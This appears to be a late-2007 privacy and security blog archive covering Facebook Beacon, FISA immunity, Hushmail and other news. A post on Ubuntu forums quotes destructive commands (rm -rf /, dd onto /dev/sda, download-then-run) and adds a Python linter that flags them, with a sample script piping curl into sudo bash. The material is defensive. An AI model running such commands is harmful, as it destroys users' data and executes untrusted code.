
November 30, 2007

'Tis the Season for Self-Serving Productivity Surveys

Times Online: Top 14 spurious productivity surveys:

"Last week I wrote about workplace productivity, and claimed barely a week passes without someone somewhere publishing an outlandish, pr-inspired survey supposedly exposing a way in which workers waste time. Eager to maximise my own productivity, and eager to minimise the workplace productivity of timesonline readers, I kept a record of the weirdest ones as I did my research, and am now delighted to present a list of the top 14 most ridiculous productivity surveys, as presented in the press, in reverse order of spuriousness. Somehow '14' seems an apt number for an arena that routinely sees the production of bizarrely precise estimates."

All the little Orwells in the security industry thrive on "foo will cost you n dollars per year in lost bar" studies to show that your boss needs some new tool to better control what you do or look at on the job. Since it's the holiday season, the annual "People shopping online at work will cost their employers ..." studies are rolling out as a reason for employers to deploy filters and otherwise do their part to create an over-regulated, overbearing, IT panopticon.

Posted by mhall at 6:05 PM

Facebook Tones Down Beacon, MoveOn Declares Victory

Facebook Update on Changes to Beacon:

"We appreciate feedback from all Facebook users and made some changes to Beacon in the past day. Users now have more control over the stories that get published to their Mini-Feed and potentially to their friends' News Feeds.

"Here's how the Beacon changes work:

  • Stories about actions users take on external websites will continue to be presented to users at the top of their News Feed the next time they return to Facebook. These stories will now always be expanded on their home page so they can see and read them clearly.

  • Users must click on "OK" in a new initial notification on their Facebook home page before the first Beacon story is published to their friends from each participating site. We recognize that users need to clearly understand Beacon before they first have a story published, and we will continue to refine this approach to give users choice.

  • If a user does nothing with the initial notification on Facebook, it will hide after some duration without a story being published. When a user takes a future action on a Beacon site, it will reappear and display all the potential stories along with the opportunity to click "OK" to publish or click "remove" to not publish.

  • Users will have clear options in ongoing notifications to either delete or publish. No stories will be published if users navigate away from their home page. If they delay in making this decision, the notification will hide and they can make a decision at a later time.

  • Clicking the "Help" link next to the story will take users to a full tutorial that explains exactly how Beacon works, with screenshots showing each step in the process."

The NYT follows up:

"Declaring victory, MoveOn.org Civic Action's spokesman, Adam Green, said in a statement: 'If Facebook changes their policy so that no private purchases made on other websites are displayed publicly on Facebook without a user's explicit permission, that would be a huge step in the right direction — and would say a lot about the ability of everyday Internet users to band together to make a difference.'"

Salon qualifies:

"But Facebook did not completely address critics' concerns. Specifically, it still is not allowing users to completely bow out of Beacon. Critically, this means that if you do something on a Facebook partner site, Facebook still gets information about your actions, whether you like it or not."

So go get the Firefox plugin and solve that, too.

Posted by mhall at 4:53 PM

November 29, 2007

Caveat Newbie: Ubuntu Forums Dealing With Malicious Heels

The Ubuntu forums are having trouble with malicious heels:

"We've recently had an increase in the number of dangerous commands being posted on the forums. Don't pretend you don't know what I mean -- commands that cause massive damage or disruption to the user's computer.

[...]

"I'd also like to remind users to be cautious when someone tells you to run some command or download some script as a solution to your problem. When in doubt as to the safety of the procedure, it's always a good idea to wait for more opinions, and/or have the command explained to you and verify if the explanation makes sense by consulting readily available documentation on Linux commands (such as manpages)."

Some of the commands they're warning against:

rm -rf /
rm -rf .
rm -rf *

any_command > /dev/sda
dd if=something of=/dev/sda

wget http://some_place/some_file
sh ./some_file

And there are some more subtle ones on the list, too, though not by much.
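
An added example, not part of the original post or of the Ubuntu forum announcement: a small Python linter that flags the command shapes listed above in a pasted snippet before anyone runs it. It goes slightly beyond the list (extra broad targets such as ~, and a download piped into a shell); the function names, device patterns and sample script are constructed for illustration.

```python
import posixpath
import re
import shlex
from urllib.parse import urlsplit

# Whole disks or partitions: writing here bypasses the filesystem entirely.
BLOCK_DEV = re.compile(r"^/dev/([shv]d[a-z]+\d*|(nvme\d+n\d+|mmcblk\d+)(p\d+)?)$")
# The post lists "/", "." and "*"; the other entries are added assumptions.
BROAD_TARGETS = {"/", "/*", ".", "./", "*", "./*", "~", "$HOME"}
DOWNLOADERS = {"wget", "curl"}
SHELLS = {"sh", "bash", "dash", "zsh"}
PUNCT = set("();<>|&")


def simple_commands(line):
    """Yield (preceding_operator, argv, redirect_targets) per simple command.
    Heuristic: a quoted ">" or ";" is treated like the real operator."""
    lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    op, argv, redirs = "", [], []
    tokens = iter(lexer)
    for tok in tokens:
        if tok and set(tok) <= PUNCT:
            if tok[0] in "<>":                  # redirection: consume its target
                target = next(tokens, None)
                if tok[0] == ">" and target:
                    redirs.append(target)
            else:                               # ; | & && || ( ) end a command
                if argv or redirs:
                    yield op, argv, redirs
                op, argv, redirs = tok, [], []
        else:
            argv.append(tok)
    if argv or redirs:
        yield op, argv, redirs


def audit_line(line, downloaded):
    """Return reasons this line is risky; `downloaded` carries state across lines."""
    reasons, prev_cmd = [], ""
    for op, argv, redirs in simple_commands(line):
        if argv and argv[0] == "sudo":          # look through a plain sudo prefix
            argv = argv[1:]
        cmd = posixpath.basename(argv[0]) if argv else ""
        args = argv[1:]
        for target in redirs:
            if BLOCK_DEV.match(target):
                reasons.append(f"output redirected onto {target}")
        if cmd == "rm":
            short = "".join(a[1:] for a in args if a[:1] == "-" and a[:2] != "--")
            recursive = "r" in short or "R" in short or "--recursive" in args
            force = "f" in short or "--force" in args
            hits = [a for a in args if a in BROAD_TARGETS]
            if recursive and force and hits:
                reasons.append(f"forced recursive delete of {hits[0]}")
        if cmd == "dd":
            for a in args:
                if a.startswith("of=") and BLOCK_DEV.match(a[3:]):
                    reasons.append(f"dd writes onto {a[3:]}")
        # A previously downloaded file run directly or handed to a shell.
        for path in (args if cmd in SHELLS else argv[:1]):
            if posixpath.basename(path) in downloaded:
                reasons.append(f"executes downloaded file {path}")
        if cmd in SHELLS and op == "|" and prev_cmd in DOWNLOADERS:
            reasons.append("download piped straight into a shell")
        if cmd in DOWNLOADERS:
            for a in args:
                name = posixpath.basename(urlsplit(a).path) if "://" in a else ""
                if name:
                    downloaded.add(name)
        prev_cmd = cmd
    return reasons


def audit(script):
    """Return [(line_number, reason), ...] for a pasted multi-line snippet."""
    findings, downloaded = [], set()
    for lineno, line in enumerate(script.splitlines(), 1):
        try:
            findings += [(lineno, why) for why in audit_line(line, downloaded)]
        except ValueError as exc:               # unbalanced quotes, malformed URL
            findings.append((lineno, f"could not parse: {exc}"))
    return findings


# Constructed sample of a pasted "fix", reusing the placeholder names from the post.
SAMPLE = """\
wget http://some_place/some_file
sh ./some_file
dd if=something of=/dev/sda
any_command > /dev/sda
cd /tmp/build && rm -rf *
rm -f notes.txt
curl -s http://some_place/setup | sudo bash
"""

if __name__ == "__main__":
    print("\n".join(f"line {n}: {why}" for n, why in audit(SAMPLE)))
```

A clean result only means none of these shapes matched; the forum's advice to have the command explained and checked against the manpages still applies.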

(via Lifehacker)

Posted by mhall at 1:42 PM

November 28, 2007

Zero-Day Exploits Down. So what?

internetnews.com: SANS: Zero-Day Exploits on The Decline:

"Ed Skoudis, who serves as course director for SANS Incident Handling and Hacker Exploits, explained during the conference call why he thinks zero-day is on the decline.

"'One of the reasons is that bad guys don't have to use them (zero day),' said Skoudis, who also founded information security consultancy Intelguardians.

"For example, he said, the Storm worm propagates itself through users clicking on an e-mail link, and does not require a zero-day exploit to function.

"'When simple techniques work, there is no need to unfurl zero-days,' Skoudis said. 'Attackers can just save them for more targeted attacks.'"

Which is why all the braying about which operating system is more or less secure is bad for people who aren't reading the headlines: No operating system can protect you from yourself.

Posted by mhall at 8:10 PM

November 27, 2007

Ten Secure Browsing Extensions for Firefox

Linux.com: Ten Firefox extensions to keep your browsing private and secure:

"Most people lock their doors and windows, use a paper shredder to protect themselves from identity theft, and install antivirus software on their computers. Yet they routinely surf the Internet without giving a second thought to whether their browser is secure and their personal information safe. Unfortunately, it's easy for someone with nefarious intentions to use a Web site to glean data from -- or introduce spyware to -- your computer. Even worse, sometimes all you have to do is randomly click on a site to have your data probed in a most unwelcome way.

"Mozilla Firefox has several security settings you can adjust via the Preferences pane, but there are also more than 150 privacy and security extensions you can add as well. They are easy to install and take little time to set up; some even work automatically after you restart your browser. Let's have a look at some of the most popular and most useful."

This isn't a bad list, but there are a few things worth noting on the picks:

As a reader in that article's comments points out, TrackMeNot has issues:

"[...] some of the program's searches are worse than yours. The dictionary includes: HIV, atomic, bomb, bible, bibles, bombing, bombs, boxes, choke, choked, chokes, choking, chain, crackers, empire, evil, erotics, erotices, fingers, knobs, kicking, harier, hamster, hairs, legal, letterbomb, letterbombs, mailbomb, mailbombing, mailbombs, rapes, raping, rape, raper, rapist, virgin, warez, warezes, whack, whacked, whacker, whacking, whackers, whacks, pistols

"Does anyone reall [sic] think that searches on 'erotic rape,' 'mailbombing bibles,' and 'choking virgins' will make their legitimate searches less noteworthy? And four, it wastes a whole lot of bandwidth. A query every twelve seconds translates into 2,400 queries a day, assuming an eight-hour workday. A typical Google response is about 25K, so we're talking 60 megabytes of additional traffic daily. Imagine if everyone in the company used it.

"I suppose this kind of thing would stop someone who has a paper printout of your searches and is looking through them manually, but it's not going to hamper computer analysis very much. Or anyone who isn't lazy. But it wouldn't be hard for a computer profiling program to ignore these searches."

Secure Password Generator isn't a bad idea, either, but I'd suggest it's not the best idea. I wrote about Password Composer for Practically Networked. It has the benefit of generating random passwords that don't require anything more than remembering a master password. Presumably you can keep one password in your head without having to write it down or divulge it to anyone.

The Petname extension seems clever, too:

"The petname tool will be enabled anytime you visit a site using SSL strong encryption. Initially, the petname tool will display the text 'untrusted'. If you decide to form a relationship with the site, overwrite this text with a reminder note describing the new relationship. The petname tool will remember this reminder note and display it every time you visit the site. Be sure to always check that the petname tool is displaying the expected reminder note before sending personal information to a site. If you have the misfortune to land on a spoof site, you'll know it because the petname tool will be displaying the text 'untrusted', instead of your expected reminder note."

It's a poor man's two-factor authentication, but two-factor authentication doesn't work with complete reliability even when it's not being done by a poor man. I don't know if I'd want the added layer of complexity this add-on introduces.

(via Lifehacker, where there are a few good additional comments on the problems with Tor routers)

Posted by mhall at 5:27 PM

Facebook Backlash Watch: Creepy, Clingy, Not Interested In Saying Goodbye

I think it's safe to say Facebook has managed to achieve an important stage in the lifecycle of any Web success story: The cool kids have decided they hate it. Maybe not any of the cool kids you and I know face to face, who probably still like it. Just that nebulous collection of Cool Kids out there on the 'net who usually start sniffing with disdain once the profit motive manifests. And in Facebook's case, it has.

So here are three Facebook Backlash Watch entrants:

CNET: MoveOn to Facebook: We caught you red-handed:

"Last week, a feud began to brew between leftist activist group MoveOn.org and social-networking site Facebook concerning its 'Beacon' advertisements, which broadcast information about users' activity on third-party partner sites to their friends' Facebook newsfeeds. According to MoveOn, it's a violation of user privacy because there's no way to universally opt out of Beacon ads. Facebook retorted, and the argument has turned into a legitimate debate over how far is really too far when it comes to sharing information about members' activity.

"Now, MoveOn is poised to launch a new offensive against Facebook, claiming that early screenshots of Beacon posted by TechCrunch indicated that the advertising application once included a 'global opt-out' that would allow members to block it entirely. According to MoveOn, this never made it into the final version, and the organization--which has created a petition and a Facebook group to raise awareness of what it sees as a hot-button issue--wants to know why."

Cory Doctorow: How Your Creepy Ex-Co-Workers Will Kill Facebook:

"In the real world, we don't articulate our social networks. Imagine how creepy it would be to wander into a co-worker's cubicle and discover the wall covered with tiny photos of everyone in the office, ranked by 'friend' and 'foe,' with the top eight friends elevated to a small shrine decorated with Post-It roses and hearts. And yet, there's an undeniable attraction to corralling all your friends and friendly acquaintances, charting them and their relationship to you. Maybe it's evolutionary, some quirk of the neocortex dating from our evolution into social animals who gained advantage by dividing up the work of survival but acquired the tricky job of watching all the other monkeys so as to be sure that everyone was pulling their weight and not napping in the treetops instead of watching for predators, emerging only to eat the fruit the rest of us have foraged.

"Keeping track of our social relationships is a serious piece of work that runs a heavy cognitive load. It's natural to seek out some neural prosthesis for assistance in this chore. My fiancee once proposed a 'social scheduling' application that would watch your phone and email and IM to figure out who your pals were and give you a little alert if too much time passed without your reaching out to say hello and keep the coals of your relationship aglow. By the time you've reached your forties, chances are you're out-of-touch with more friends than you're in-touch with: Old summer-camp chums, high-school mates, ex-spouses and their families, former co-workers, college roomies, dot-com veterans... Getting all those people back into your life is a full-time job and then some.

"You'd think that Facebook would be the perfect tool for handling all this. It's not. For every long-lost chum who reaches out to me on Facebook, there's a guy who beat me up on a weekly basis through the whole seventh grade but now wants to be my buddy; or the crazy person who was fun in college but is now kind of sad; or the creepy ex-co-worker who I'd cross the street to avoid but who now wants to know, 'Am I your friend?' yes or no, this instant, please."

And having winced over the bitter, wince some more over the bitterly funny as we go back to July, when Steven Mansour decided it was time to kill his Facebook profile:

"It's one thing when I choose to leave a web service (Flickr, Youtube) because I don't want them profiting from my content. It's another when they prevent me from leaving. Is this really the only choice we have left? Shitty web companies vs. shitty web companies that keep and distribute your personal data ad infinitum even when you request your account to be closed?

"As it turns out, I had to 'contact' facebook and ask them how to delete my account, only to find out that I have to manually delete every single minifeed item, friend, post, wall writing, etc by hand, one-by-one, or else they will refuse to close your account. When you're a member of the Internet High Society as I am, you find that you have thousands of these items to delete."

I spent yesterday overwriting all the data in my profile with a lot of nothing, then dropping all my friends, networks, apps and groups. I think. The main point was to get rid of the personally identifiable information. Maybe I'll try to delete the account altogether and report back.

(thanks, Ed)

Posted by mhall at 2:53 AM

November 26, 2007

Squashed Malicious Attachment Bug From Tiger's Mail is Back for Leopard

Heise Security -- Apple Mail in Leopard with the same old error:

"In March 2006 Apple defused a security problem in Apple Mail that made it possible to inject disguised malignant code. In Leopard, the patch was apparently forgotten. This means that you can inadvertently start an executable by double-clicking a mail attachment that looks like a JPEG image file."

Jeez.

(via Daring Fireball)

Posted by mhall at 3:19 PM

November 21, 2007

Poll: 40 Percent of Americans Say Privacy Rights "Important" in 2008 Election

MSNBC: Is Obama the privacy candidate?:

"Americans think Barack Obama is the Democrat most likely to advance their privacy rights and that Rudy Giuliani is the least privacy-sensitive of the top three Republican candidates, a new survey suggests.

"The telephone poll of 600 adults, conducted by private research firm The Ponemon Institute, also found that 40 percent of Americans say protection of privacy rights is either important or very important in determining preference for the next presidential election.

"Asked to select both the Democratic and Republican candidate they believe is most likely to 'advance your privacy rights,' respondents preferred Obama over Hillary Clinton and John Edwards by nearly a 2-to-1 ratio, with 43 percent naming Obama compared to 25 percent for Edwards and 23 percent for Clinton."

(via)

Posted by mhall at 3:26 PM

November 20, 2007

Criminals Exploit Unused Yahoo IP to Reel In Google Users

internetnews.com: Hackers Abuse Domain-Name Trust:

"In the case of Yahoo, security firm Finjan said hackers exploited an unused IP address within Yahoo's hierarchy and used that as the domain address behind a forged Google Analytics domain name. This fooled the Web-filtering products into believing a person was going to a highly trusted Yahoo domain. The victims never knew they were on a malicious Web site, and neither did the security mechanisms on the network.

"'They managed to resolve the domain name to an IP address owned by Yahoo. How they added an address into a DNS server to appear to be an IP address owned by Yahoo is unknown,' Yuval Ben-Itzhak, CTO of Finjan, told InternetNews.com. He added that Yahoo, while responsive and quick to shut down the compromised address, did not disclose exactly what equipment was behind the compromised IP address.

"Ben-Itzhak thinks something in the server was broken that enabled the bad guys to push that content down to users without Yahoo knowing. He said that's a flaw in social networks."

The flaw being that they allow people to upload stuff, including malicious code. But it's not clear from this article where social networking sites fit in.

Posted by mhall at 7:07 PM

Hushmail Says Any Mail Using Its Service Is Compromisable

Hushmail To Warn Users of Law Enforcement Backdoor:

"Hushmail responds only to court orders from the Supreme Court of British Columbia that target specific, named accounts, according to Hushmail's CTO Brian Smith. In the steroid case, the Drug Enforcement Agency used a mutual legal assistance treaty to get a Canadian court order, according to court documents.

"But when the company gets a court order, 'we are required to do everything in our power to comply with the law,' according to an updated explanation of Hushmail's security.

"That everything seems to include sending a rogue Java applet to targeted users that will then report the user's passphrase back to Hushmail, thus giving the feds access to all stored emails and any future emails sent or received."

Hushmail itself points out what one might think pretty quickly, were one to go off shopping for something without a +5 Applet of Weaseling:

"PGP Desktop and GnuPG are not web-based services. They install as software on your computer. Installed software is different from a web-based service in that you don't rely on the owner of the website to run the software correctly. You take on that responsibility yourself. If used correctly, both PGP and GnuPG can provide an extremely high level of security. When choosing your security solution, carefully weigh the convenience and ease-of-use of Hushmail against the inherent limitations of a web-based service."

Posted by mhall at 2:07 AM

November 19, 2007

Spyware-Using Husband Gets Four Years

So I Married a Spyware Installer:

"When Shawn Macleod of Austin, Texas, suspected his estranged wife was engaging in some kind of suspicious behavior, he installed a spyware program on her computer to monitor her e-mails and Web behavior.

"He now faces four years in jail.

"The turn of events began in August 2005 when Macleod's estranged wife Kristy reported to police that she suspected Macleod was monitoring her computer use. Detectives caught Macleod when he fell for a sting operation. The detectives then searched the computer and found SpyRecon software on it, according to a report in the Austin-American Statesman.

"SpyRecon from Secure Tactics is billed as 'the most effective and powerful Password Finding and Spy Software!' on its rather 1990s-looking homepage. The company had no contact phone number, only an e-mail address, and did not respond to queries from InternetNews.com.

"Austin police charged Macleod with unlawful interception of electronic communication, the equivalent of an illegal wiretap, which is a second-degree felony that can carry a 20-year sentence. Macleod pleaded guilty in May and was given his four-year sentence this month."

Posted by mhall at 1:32 PM

Security Shocker: iPhone's Exploitable

Fast Company: Hacking the iPhone:

Adam Penenberg and his editors wondered:

"... just how vulnerable is the 'Jesus Phone' to an unscrupulous hacker? Could it really be turned into a tool of espionage?

"So we purchased an iPhone for Rik Farrow, a UNIX specialist and consultant from Sedona, Arizona, and commissioned him to crack through its defenses, which he did using H D Moore's Metasploit, a popular platform for testing security systems. The result is this video, in which Farrow was able to take complete control of an iPhone and demonstrate the ability to eavesdrop on conversations, intercept voice mail and e-mail, and upload nefarious software programs. 'Physical access to an iPhone,' Farrow points out, 'is not required.' Although in Farrow's demo the Wi-Fi was turned on -- common enough for iPhone users, since AT&T's EDGE network makes Web surfing slow and laborious -- Moore says his exploit can work on EDGE, too."

However:

"... before you stash your iPhone in a drawer, realize there isn't much value in attacking smartphones a la carte. 'Taking over a PC allows you to install spam distribution servers that shoot out ads,' says Daniel Eran Dilger, a San Francisco-based technical consultant and contributing editor to AppleInsider. 'There's no real business model behind the kind of spy surveillance imagined by many writers.' And Apple (which declined to comment), in its latest patch, inoculated the iPhone against the Metasploit that Farrow used. But in the cat-and-mouse game that hackers and companies like Apple play, you can be sure someone somewhere is hatching up new schemes to hack the iPhone. Perhaps they already have."

Also, Wired writer Kim Zetter takes time to say "I told you so" to blogger Daniel Dilger, who scored big on the "blithely clueless" meter with this nugget:

"Zetter's article revolves around the idea that because the iPhone runs all its internal applications as the same root user account, users are imperiled by potential crisis. How bad is it? Windows bad, at least according to Zetter's headline.

"'Every application on the device — from the calculator on up — runs as 'root,' i.e., with full system privileges,' Zetter noted. 'As a result, a serious vulnerability in any of these applications would allow hackers to gain complete control of the device.'

"Let's make that simpler. A serious vulnerability in anything would allow hackers to gain complete control of anything."

Let's make it simpler yet: Sandbox user apps in a less privileged user account, reduce the risk of an exploited user app causing mayhem elsewhere. That model's been working for Unix for a while. Even Apple seems to kind of like it, considering, you know, OS X.

But then again, he says "There’s simply no way to run code on the iPhone, outside of its web application platform within Safari."

Which is a perfect argument for isolating applications like Safari so when they're exploited and compromised they can't do as much harm, whatever form that harm could take.

Posted by mhall at 1:30 PM

Wired: Spy Ruling Bodes [Well|Ill] for AT&T Eavesdropping Case

Institutionally, Wired can't make up its mind:

Analysis: Spy Ruling Bodes Well for AT&T Eavesdropping Case:

"THREAT LEVEL colleague David Kravets thinks otherwise, seeing only doom in the future for both suits, but I think his all-but-obituary doesn't appreciate that these two cases have always seemed doomed and yet continue to find ways to survive.

"In fact, today's ruling shows how these cases could continue to proceed, despite the omens that have been hanging over them from the start."

Analysis: Spy Ruling Portends Hurdles for AT&T Eavesdropping Case:

"The federal appellate court's decision (.pdf) Friday declaring that top secret documents were protected under the so-called state secrets privilege more than likely ends the lawsuit brought by two lawyers for suspected terrorists. The lawyers accused the government of unlawfully spying on their electronic communications without warrants.

"The decision by the 9th U.S. Circuit Court of Appeals, however, portends serious procedural hurdles in another and more far-reaching domestic spying case, one in which thousands of AT&T customers allege the telecommunications giant has funneled virtually all of its communications traffic to the National Security Agency without warrants. My THREAT LEVEL colleague Ryan Singel thinks otherwise, or does he?"

Posted by mhall at 12:57 PM

November 17, 2007

There Are a Lot of Free E-Mail Services ... You Should Use One

Reuters/Wired: Companies Read Employee E-Mail:

"Big Brother is not only watching but he is also reading your e-mail.

"According to a new study, about a third of big companies in the United States and Britain hire employees to read and analyze outbound e-mail as they seek to guard against legal, financial or regulatory risk.

"More than a third of U.S. companies surveyed also said their business was hurt by the exposure of sensitive or embarrassing information in the past 12 months, according to the annual study from a company specializing in protecting corporate e-mail at large businesses.

"'What folks are concerned about is confidential or sensitive information that is going out,' said Gary Steele, chief executive of Cupertino, California, company Proofpoint, which conducted the study along with Forrester Research."

I have a few dear friends who use their work e-mail address as their primary address and, frankly, it freaks me out.

Posted by mhall at 2:09 AM

November 16, 2007

Do YOU Understand Your Social Networking Site's Privacy Policy?

Valleywag has an entry on a gun owner who claims "her bosses asked Facebook for permission to see her profile -- which is normally set to private for everyone but her friends -- through something called Administrators Access."

The gun owner's original forum post is sort of hard to parse, but here's the part involving Facebook:

"My employer [...] is using its insurance company to pay for 'profiles' on facebook of people who are employed by my corporation."

I'm assuming that means the insurance company is collecting profiles of employees of this company who use Facebook.

That's interesting, I suppose.

The employee posts a fragment of Facebook's privacy policy to establish that what they did wasn't right. Which caused me to re-read the same policy:

"We may be required to disclose user information pursuant to lawful requests, such as subpoenas or court orders, or in compliance with applicable laws. We do not reveal information until we have a good faith belief that an information request by law enforcement or private litigants meets applicable legal standards. Additionally, we may share account or other information when we believe it is necessary to comply with law, to protect our interests or property, to prevent fraud or other illegal activity perpetrated through the Facebook service or using the Facebook name, or to prevent imminent bodily harm. This may include sharing information with other companies, lawyers, agents or government agencies."

Quick: Which laws in your state or city might be applied to getting Facebook to expose all the information in your profile? I don't know, either. It's all broad enough to be meaningless, especially when you throw in the part about Facebook protecting its interests, which could be construed to include "avoiding even frivolous litigation from an insurance company claiming it's investigating employee fraud."

Posted by mhall at 7:28 PM

House Passes Immunity-Free Bill

Reuters: Democrats vote to curb Bush's warrantless spying:

"The vote in the Democratic-led House was 227-189. Lawmakers voted largely along party lines.

"The bill now heads to the Senate for consideration. If it passes both chambers, the White House has threatened to veto the measure, warning it would hamper electronic spying efforts, subjecting the United States to increased risks.

"White House spokeswoman Dana Perino said the bill 'fails to give our intelligence community the tools it needs, and it fails to protect companies facing massive lawsuits for allegedly stepping up and answering the nation's call for help after the 9/11 terrorist attacks.'"

Posted by mhall at 1:53 PM

November 15, 2007

FISA Refit Emerges from Senate Committee with No Telco Immunity

CNN: Committee passes surveillance laws update in face of veto threat:

"One of the key changes approved by the [Senate Judiciary] committee would make clear that the FISA law is the exclusive authority for approving warrants for electronic surveillance.

"The full Senate still must approve the bill.

"The committee Thursday also decided to let the full Senate decide the controversial question of whether to grant retroactive immunity to the telecommunications companies that cooperated with the National Security Agency's warrantless surveillance program, The Associated Press reported." [emph. mine -mph]

Reports of a "stunningly unexpected win" for civil liberties groups are nice to read, but who thinks the full Senate is going to approve anything without immunity?

Meanwhile, the bill coming out of the Intelligence Committee does have immunity written in. Senate Majority Leader Harry Reid has the prerogative to reconcile the two bills before putting them up for vote.

Posted by mhall at 8:53 PM

Apple Fixes Dopey Firewall Language

Apple: About the Mac OS X 10.5.1 Update:

In Security preferences' Firewall tab, the "Block All" option is now called "Allow Only essential services"

Previously. And previously at PracNet.

Posted by mhall at 4:49 PM

November 14, 2007

Finding an Alternative to Telecom Immunity

Slate: The smart way around telecom immunity:

"Bush lawyers have used the state secrets privilege to convince a federal appeals court to dismiss an ACLU lawsuit against the National Security Agency asking a court to declare the spying program illegal. And in the cases that have been brought against the telecoms, the administration has invoked the same privilege to argue that courts can't let the cases go forward because the telecoms would be in the unfair position of not being able to defend themselves—because, of course, the administration won't let the companies turn over the relevant documents. Retroactive immunity isn't about letting the telecoms off the hook. It's about hiding the administration's own legal claims from any judicial or public scrutiny. The administration wants to keep these cases out of court so it can cover up for itself.

"Congress can protect the telecoms without falling for this trick. In reforming FISA, Congress should enact a comprehensive law governing the state secrets privilege, one that protects our national security and also allows litigants to make their case in court. Congress figured out this sort of balancing act for criminal cases decades ago when it passed the Classified Information Procedures Act; now it's time to do the same for civil suits. We agree with the administration that state secrets should be protected at all costs. But this administration can no longer be trusted to use the privilege to protect only genuine secrets. It's instead covering up its own dubious legal reasoning—not just in the domestic surveillance cases, but also to avoid scrutiny of the torture and rendition programs at issue in the cases of Khalid El-Masri and Maher Arar. Someone other than the executive must be able to review whether the executive is abusing the privilege."

Oh ... you wanted a punch-line, too?

"The ongoing FISA debate gives Congress an opportunity to step in where the court has failed to. If Congress is serious about allowing the telecoms to defend themselves, while holding the administration accountable, fixing the state secrets privilege is the place to start. Then, it'll be time for the administration to state its secrets."

That's a mighty big "if."

Half of Congress is all for "allowing the telecoms to defend themselves," and not at all for "holding the administration accountable." And the other half is a mixed bag we can expect will not push for any sort of confrontation on the issue.

Prediction: Arguments like this become cover for immunity, but the second half ... the part about reforming oversight to the point these kinds of abuses don't happen again ... dies quietly.

Posted by mhall at 7:26 PM

Europe Puts Up a Roadblock for Google/DoubleClick

NYT: Google Hits European Hurdle on DoubleClick Deal:

"European regulators refused Tuesday to approve Google’s $3.1 billion purchase of the Internet advertising company DoubleClick. They ordered a review of the deal amid opposition from rivals, publishers and consumer groups.

"The European Commission, the administrative arm of the European Union, which rules on antitrust issues for the 27 member nations, said the merger raised concerns about competition and required a more thorough review of its effects on the Internet advertising business."

Further down, though:

"Many of the increasing objections filed with the commission in recent weeks centered on privacy issues, rather than on the ways that a Google-DoubleClick merger would affect competition. A commission spokesman said that by law the commission could not base an antitrust decision on anything but the market impact.

"An umbrella group of European consumer organizations, BEUC, complained to the commission as early as July that a takeover of DoubleClick would damage privacy rights and limit Internet content. Others joining the complaint included the European Publishers Council and the World Federation of Advertisers."

Posted by mhall at 7:20 PM

Leave It to Canada to Explain Privacy and Social Networks Well

The Office of the Privacy Commissioner of Canada has released a video about privacy and social networks.

My favorite part of the whole thing is its tone, because it doesn't give in to the urge to grab the viewer by the lapels and START EXPLAINING HOW COMPLEX AND SCARY THIS ALL IS.

Instead, the narrator spells things out in an affable and calm voice that hits the highlights, pulls no punches about the underlying corporate value of social networking services, and explains the ways in which your information can be used. And there are attractive charts in soothing colors.

Privacy could use more advocacy like this.

via PogoWasRight

Posted by mhall at 7:02 PM

November 13, 2007

Also, Twittering "Told boss home sick ... sucker" is probably a bad idea.

Valleywag: Bank intern busted by Facebook:

"Kevin Colvin, an intern at Anglo Irish Bank's North American arm, was busted when he told his manager, Paul Davis, that he'd miss work due to what colleagues took to be a "family emergency". Davis turned up the photo above, freshly posted to Facebook from the Halloween party Colvin apparently missed work to attend, and attached it to his reply, copying the rest of the office as he did it."

Follow that link ... the picture is a hoot.

Posted by mhall at 6:57 PM

Yahoo Settles Case With Chinese Writers

Wired: Yahoo Settles with Chinese Writers:

"Terms of the settlement weren't disclosed. But a source at Yahoo said the company has been 'working with the families, and we're working with them